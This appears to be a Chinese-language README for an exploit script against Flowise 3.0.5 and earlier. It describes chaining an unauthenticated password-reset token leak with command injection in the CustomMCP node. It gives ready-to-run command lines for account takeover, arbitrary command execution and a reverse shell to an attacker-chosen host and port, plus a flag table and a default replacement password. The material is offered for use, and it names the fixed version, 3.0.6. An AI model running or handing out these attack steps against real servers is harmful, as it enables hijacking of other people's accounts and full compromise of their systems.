影响 Flowise <= 3.0.5 的两个漏洞的利用链。
忘记密码接口会在 API 响应中返回有效的密码重置令牌,且无需认证。只要知道有效电子邮件地址的攻击者即可在无用户交互的情况下重置任意账户的密码。
CustomMCP 节点将用户控制的输入直接传递给 Function() 构造函数,并拥有完整的 Node.js 权限。拥有有效 API 密钥的认证用户可以以 Flowise 进程用户的身份执行任意操作系统命令。
修复版本: Flowise 3.0.6
pip install requests完整 ATO 链(重置密码、提示输入 API 密钥、触发反弹 Shell):
python3 flowise_chain.py -t http://target -e [email protected]
仅 RCE(如果你已有 API 密钥):
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
使用现有密钥的反弹 Shell:
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
| 标志 | 描述 |
|---|---|
-t, --target | 目标 URL |
-e, --email | 目标账户邮箱(触发 ATO 链) |
--api-key | 直接提供 API 密钥(跳过 ATO) |
-c, --command | 要执行的命令 |
--lhost | 攻击者 IP(反弹 Shell) |
--lport | 攻击者端口(反弹 Shell,默认:4444) |
--new-password | 重置时设置的新密码(默认:Pwn3d!2026) |
-k, --insecure | 跳过 TLS 验证 |
由于 Flowise 3.0.5 的一个特性,重置密码 API 端点不会立即更新登录端点所接受的凭据。脚本在重置后会暂停,并提示你手动登录 UI 并从 /apikey 复制 API 密钥。